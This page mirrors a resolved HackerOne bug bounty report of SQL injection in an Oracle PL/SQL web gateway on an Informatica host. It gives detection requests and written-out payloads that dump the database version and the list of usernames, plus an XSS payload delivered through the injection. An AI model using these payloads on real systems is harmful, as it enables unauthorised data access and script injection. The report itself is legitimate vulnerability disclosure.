Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

[ipm.informatica.com] Sql injection Oracle

Critical
I
Informatica
Submitted None
Actions:
View on HackerOne
Reported by e3xpl0it

Vulnerability Details

Technical details and impact analysis

SQL Injection
Hi host ipm.informatica.com is vulnerable to sql injection attacks the web application does not produce sufficient validation on user input. POC detection request 1 http://ipm.informatica.com/pls/apex/f?1'=1 response 500 HTTP/1.1 500 Internal Server Error request 2 http://ipm.informatica.com/pls/apex/f?1''=1 response HTTP/1.1 404 Not Found exploitation http://ipm.informatica.com/pls/apex/f?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+banner+FROM+v$version Oracle Database 11g Release 11.2.0.3.0 - 64bit Production PL/SQL Release 11.2.0.3.0 - Production CORE 11.2.0.3.0 Production TNS for Linux: Version 11.2.0.3.0 - Production NLSRTL Version 11.2.0.3.0 - Production Cross Site Scripting via sql injection http://ipm.informatica.com/pls/apex/f?);HTP.PRINT(:1);--=positive<svg/onload=prompt('XSS\u0020via\u0020sql\u0020injection')> and etc http://ipm.informatica.com/pls/apex/f?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+ALL_USERS

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

SQL Injection